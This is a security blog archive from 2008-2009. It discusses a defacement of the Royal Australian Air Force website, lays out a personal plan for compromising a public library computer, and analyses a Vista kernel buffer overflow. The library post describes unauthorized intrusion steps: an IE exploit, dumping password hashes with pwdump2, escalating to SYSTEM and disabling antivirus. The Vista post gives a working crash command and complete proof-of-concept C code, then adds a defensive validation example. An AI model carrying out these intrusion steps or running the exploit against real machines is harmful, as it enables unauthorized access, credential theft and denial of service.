Archive for the ‘Uncategorized’ Category
RAAF website defaced
Atul Dwivedi, an Indian hacker, paid a visit to the Royal Australian Air Force (RAAF) last Monday by defacing its website.
This incident comes amid a rise in violence targeted at Indian nationals in Australia, and Dwivedi apparently protested this situation by leaving a message on the website:
“This site has been hacked by Atul Dwivedi. This is a warning message to the Australian government. Immediately take all measures to stop racist attacks against Indian students in Australia or else I will pawn all your cyber properties like this one.”
The site is now up and running as normal. Of course, the web server was not connected to any internal network and did not contain any classified information, according to a spokeswoman:
“No sensitive information was compromised as the air force internet website is hosted on an external server and, as such, does not hold any sensitive information.”[1]
Microsoft products are used in pretty much every Western armed force, so it is tempting to assume that the RAAF web server runs IIS, which would imply a Windows Server host and, most likely, a mostly Microsoft stack. That assumption can actually be checked: according to David M Williams of ITWire[2], the website is hosted by Net Logistics, an Australian hosting company, which means the platform is whatever Net Logistics runs, not necessarily what the armed forces use internally. The ITWire article tries to explain the hack through exploits, which may well be how Dwivedi did it, but its analysis is simple and lacks depth. It does include a useful link to a blog post detailing the WebDAV exploit; see the references below.
It is also not impossible that Dwivedi tricked someone into giving out too much information. Social engineering can do a lot and is usually easier than technical exploits; The Art of Deception by Kevin Mitnick should convince most people of that. Someone could look up RAAF staff on Facebook or another social networking site and then try to pose as them.
Then again, why not look for an FTP server? And who knows what else the server is running; maybe an SMTP server too (and it probably does). I would not suggest doing this, but a port scan would probably reveal a lot of information. Moreover, web vulnerability scanners like Nikto could help find misconfigured ASP settings or forgotten test/setup pages and files. Up to that point, only two things matter: information gathering and imagination.
See also:
“Hacker breaks into RAAF website”, AAP, Brisbane Times, July 16, 2009, http://news.brisbanetimes.com.au/breaking-news-national/hacker-breaks-into-raaf-website-20090716-dmrn.html accessed on 2009-07-17
“WebDAV Detection, Vulnerability Checking and Exploitation”, Andrew, SkullSecurity, May 20, 2009, http://www.skullsecurity.org/blog/?p=285 accessed on 2009-07-17
[1] “Indian hacks RAAF website over student attacks”, Asher Moses, The Sydney Morning Herald, July 16, 2009, http://www.smh.com.au/technology/security/indian-hacks-raaf-website-over-student-attacks-20090716-dmgo.html accessed on 2009-07-16
[2] “How did Atul Dwivedi hack the RAAF web site this week?”, David M Williams, ITWire, July 17, 2009, http://www.itwire.com/content/view/26344/53/ accessed on 2009-07-16
Back online
Good day everyone,
For the past 6 months, I was on a very demanding course which caused me to stop writing to this blog. This was very unfortunate, but success on this particular course was very crucial to me. Now that it’s over, I’ll finally be able to resume writing articles on computer security and cyberwarfare. I’m sorry for the lack of news in the last months and hopefully I’ll be able to regain your attention.
Thank you
Happy Holidays
This blog is gonna be quiet for the upcoming weeks, as the holidays kick in. But I’ll be back in January. Until then, Merry Christmas and happy New Year to all my readers. Health, love and success are what I wish every one of you, and thank you for being readers of this humble blog.
See you soon
Jon
Fun at the Library – Part 2
I’ve returned to the library to go a little bit further. So I opened up a command prompt and started the explorer shell. I plugged in my war key; it didn’t run automatically, but it was still accessible.
To my astonishment, the OS was Windows XP SP2…not SP3. That’s nice to know. As expected, the network uses Active Directory and I’m logged in as an anonymous user. McAfee is used, and it detected and erased things it didn’t like on my key. Thank you McAfee, now I need to write my own stuff.
The version of Internet Explorer is 6.0. So if I were to continue this adventure, I’d first start by owning the machine with some exploit, by crafting a web page with an exploit for Windows XP SP2. That could easily be done by looking at Milw0rm. With root access to the machine, I could then install a sniffer and see what goodies I could get. Then I would map the network and see what I could do with the server.
But I like it clean, so it would be nice to actually have the password for the local admin… For that I would need to get my hands on the SAM file in C:\windows\system32\config. I don’t want to use NTFSDOS because I would have to reboot the computer, and that would look totally suspicious. So I would use pwdump2 to get the hashes from the registry and crack them at home. Another way would be to get SYSTEM privileges; then I should just be able to copy the SAM file to my war key with ease. This could be done if I use the exploit to gain root, then use the AT command to schedule a command prompt and restart explorer as SYSTEM.
One thing to remember would be to shut down McAfee before inserting the USB key, because it would delete all of my tools. Hopefully this could be done by shutting down the McAfee Framework Service… and it would be accessible at my user level.
Attacking the Vista Kernel
CNet reported not long ago on a new vulnerability found in the Vista kernel[1]. The bug is a buffer overflow that corrupts kernel memory and can therefore be used for denial of service. The report from Phion, the security company that found the vulnerability, also states that it could be used to inject code[2].

The buffer overflow is triggered by adding a route with an illegal prefix length (number of subnet bits) to the IPv4 routing table. For example, the following command makes Vista crash with a blue screen of death:
C:\>route add 127.0.0.1/250 127.0.0.2
In the command above, we specified 250 as the number of subnet bits, which is an illegal value for IPv4 (the maximum is 32). According to the vulnerability report by Thomas Unterleitner, the greater the value, the quicker the crash is provoked[3].
The overflow is reached through the CreateIpForwardEntry2 function of the IP Helper library (Iphlpapi.dll). The function does not verify the PrefixLength field of DestinationPrefix in the MIB_IPFORWARD_ROW2 structure passed to it, so an oversized value travels down into the kernel, where NETIO!PtpCopyPartialKeys uses it to size a memcpy into a fixed-size buffer (see the disassembly below). The following code should therefore crash the kernel[4]:
/* Link with iphlpapi.lib and ws2_32.lib. Usage: prog <ifNum> <numOfBits> */
#define _WIN32_WINNT 0x0600
#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winsock2.h>
#include <ws2ipdef.h>
#include <iphlpapi.h>

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char** argv)
{
    DWORD dwStatus;
    MIB_IPFORWARD_ROW2 route;

    if (argc != 3)
    {
        printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]);
        return -1;
    }

    InitializeIpForwardEntry(&route);

    route.InterfaceIndex = atoi(argv[1]);
    route.DestinationPrefix.Prefix.si_family = AF_INET;

    route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr = inet_addr("1.2.3.0");
    route.DestinationPrefix.Prefix.Ipv4.sin_family = AF_INET;

    /* PrefixLength is taken from the command line unchecked; a value above 32 triggers the overflow */
    route.DestinationPrefix.PrefixLength = atoi(argv[2]);

    route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");
    route.NextHop.Ipv4.sin_family = AF_INET;

    route.SitePrefixLength = 0;

    route.Protocol = MIB_IPPROTO_NETMGMT;
    route.Origin = NlroManual;
    route.ValidLifetime = 0xffffffff;
    route.PreferredLifetime = 0xffffffff;
    route.Metric = 1;

    dwStatus = CreateIpForwardEntry2(&route);
    return dwStatus;
}
For this code to work you must be a member of the Administrators group or of the Network Configuration Operators group, so it is of limited use to most people, but you never know… Note that Network Configuration Operators are not administrators, so if Phion’s code-injection claim holds, the bug would amount to a privilege escalation from that group into the kernel.
The kernel side of the bug, from the advisory’s annotated disassembly of NETIO: the 16-bit PrefixLength (0xee = 238 bits) is rounded up to 30 bytes and handed straight to memcpy.
NETIO!PtpCopyPartialKeys:
    mov     edi,edi
    push    ebp
    mov     ebp,esp
    movzx   eax,word ptr [ebp+10h]   ; = 0x00ee  PrefixLength in bits
    add     eax,7
    shr     eax,3
    push    eax                      ; 0x0000001e PrefixLength in bytes
    push    dword ptr [ebp+0Ch]      ; 0x934b7ac4 src buffer
    push    dword ptr [ebp+8]        ; 0x83716398 dst buffer
    ; 83716398  00 00 00 00 00 00 00 00-05 00 06 04 45 76 65 ee
    ; 837163a8  01 00 00 00 01 00 00 00-78 81 15 83 00 00 00 00
    ; 837163b8  18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
    ; ------------------------------------------------------------------
    call    NETIO!memcpy             ; memcpy(0x83716398, 0x934b7ac4, 0x0000001e) // BUFFER OVERFLOW!!!!
    ; ------------------------------------------------------------------
    ; 83716398  01 02 03 04 00 00 00 00-00 13 6c 83 48 7b 4b 93
    ; 837163a8  78 62 8b 85 00 13 6c 83-48 13 6c 83 78 00 00 00
    ; 837163b8  18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
    ; compare the byte values with the src buffer printed before
    add     esp,0Ch
    pop     ebp
    ret     0Ch
    neg     ecx
    push    ecx
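To make the failure mode concrete, here is an added example, not the advisory’s code and not anything from Microsoft: a small user-space model in C of the copy shown in the disassembly, placed beside the validation that CreateIpForwardEntry2 did not perform. The route_entry layout, the 64-byte storage union and the source bytes are constructed for the demo; only the arithmetic (movzx, add 7, shr 3), the Windows AF_INET/AF_INET6 values and the 0xee prefix length come from the page.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example (not the advisory's code): a user-space model of the unchecked
 * prefix copy. WIN_AF_INET/WIN_AF_INET6 are Windows' AF_INET (2) / AF_INET6 (23).
 * The route_entry layout is an assumption standing in for whatever NETIO keeps
 * after the destination key; the real kernel structures are not modelled. */
#define WIN_AF_INET   2
#define WIN_AF_INET6  23

struct route_entry {
    uint8_t  key[4];          /* IPv4 destination prefix: the memcpy target */
    uint32_t interface_index; /* neighbouring fields: clobbered when the copy overruns */
    uint32_t metric;
};

union entry_storage {
    struct route_entry e;
    uint8_t raw[64];          /* slack so the demo overrun stays inside our own memory */
};

/* Same arithmetic as the disassembly: movzx of the 16-bit PrefixLength, add 7, shr 3. */
size_t prefix_bytes(unsigned prefix_bits)
{
    return ((prefix_bits & 0xffffu) + 7u) >> 3;
}

/* The validation CreateIpForwardEntry2 did not perform on DestinationPrefix.PrefixLength. */
int prefix_length_valid(int family, unsigned prefix_bits)
{
    switch (family) {
    case WIN_AF_INET:  return prefix_bits <= 32;
    case WIN_AF_INET6: return prefix_bits <= 128;
    default:           return 0;
    }
}

/* Vulnerable pattern: the copy length derives only from caller-controlled PrefixLength. */
size_t copy_prefix_unchecked(union entry_storage *s, const uint8_t *src, unsigned prefix_bits)
{
    size_t n = prefix_bytes(prefix_bits);
    memcpy(s->raw, src, n);   /* s->raw aliases e.key; any n > 4 writes past it */
    return n;
}

/* Hardened pattern: bound PrefixLength by the address family before computing a length,
 * then clamp to the key size. Returns bytes copied, or -1 when the prefix is rejected. */
int copy_prefix_checked(union entry_storage *s, int family, const uint8_t *src, unsigned prefix_bits)
{
    if (!prefix_length_valid(family, prefix_bits))
        return -1;
    size_t n = prefix_bytes(prefix_bits);
    if (n > sizeof s->e.key)  /* cannot happen for a valid IPv4 prefix; defence in depth */
        return -1;
    memcpy(s->e.key, src, n);
    return (int)n;
}

/* Replays the advisory's numbers: PrefixLength 0xee -> 30-byte memcpy into a 4-byte key.
 * Returns 1 when the fields after the key were overwritten. */
int demo_unchecked_clobbers_neighbours(void)
{
    union entry_storage s;
    uint8_t src[32];
    for (size_t i = 0; i < sizeof src; i++) src[i] = (uint8_t)(i + 1); /* constructed source bytes */
    memset(&s, 0, sizeof s);
    s.e.interface_index = 5;
    s.e.metric = 1;
    size_t n = copy_prefix_unchecked(&s, src, 0xee);
    return n == 30 && s.e.interface_index != 5 && s.e.metric != 1;
}

/* Same input through the checked path: rejected before any copy; a legal /24 copies 3 bytes. */
int demo_checked_rejects_and_accepts(void)
{
    union entry_storage s;
    uint8_t src[32];
    for (size_t i = 0; i < sizeof src; i++) src[i] = (uint8_t)(i + 1);
    memset(&s, 0, sizeof s);
    s.e.interface_index = 5;
    if (copy_prefix_checked(&s, WIN_AF_INET, src, 0xee) != -1) return 0;
    if (s.e.interface_index != 5) return 0;           /* nothing was written */
    if (copy_prefix_checked(&s, WIN_AF_INET, src, 24) != 3) return 0;
    return s.e.key[0] == 1 && s.e.key[1] == 2 && s.e.key[2] == 3 && s.e.key[3] == 0;
}

int main(void)
{
    printf("prefix_bytes(0xee) = %zu\n", prefix_bytes(0xee));
    printf("unchecked copy clobbers neighbours: %d\n", demo_unchecked_clobbers_neighbours());
    printf("checked copy rejects /238 and accepts /24: %d\n", demo_checked_rejects_and_accepts());
    return 0;
}
```

Run as-is it replays the advisory’s numbers: a PrefixLength of 0xee becomes a 30-byte memcpy into a 4-byte IPv4 key and overwrites whatever follows, while the checked path refuses anything above 32 bits for AF_INET before any copy happens. The check belongs in the kernel as well as in Iphlpapi.dll, since a user-mode DLL is not a trust boundary and the underlying interface can be called without it.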
Microsoft said it had no intention of patching this buffer overflow before the next Vista service pack[5]. The bug does not affect Windows XP.
[1] “Kernel vulnerability found in Vista”, David Meyer, CNet Security, November 22, 2008, http://news.cnet.com/8301-1009_3-10106173-83.html?part=rss&subj=news&tag=2547-1_3-0-20 (accessed on November 25, 2008)
[2] “Microsoft VISTA TCP/IP stack buffer overflow”, Thomas Unterleitner, November 19, 2008, http://www.securityfocus.com/archive/1/498471 (accessed on November 25, 2008)
[3] Ibid.
[4] Ibid. Code by Thomas Unterleitner
[5] “Vista kernel is vulnerable”, Egan Orion, The Inquirer, November 24, 2008, http://www.theinquirer.net/gb/inquirer/news/2008/11/24/vista-kernel-vulnerable (accessed on November 25, 2008)



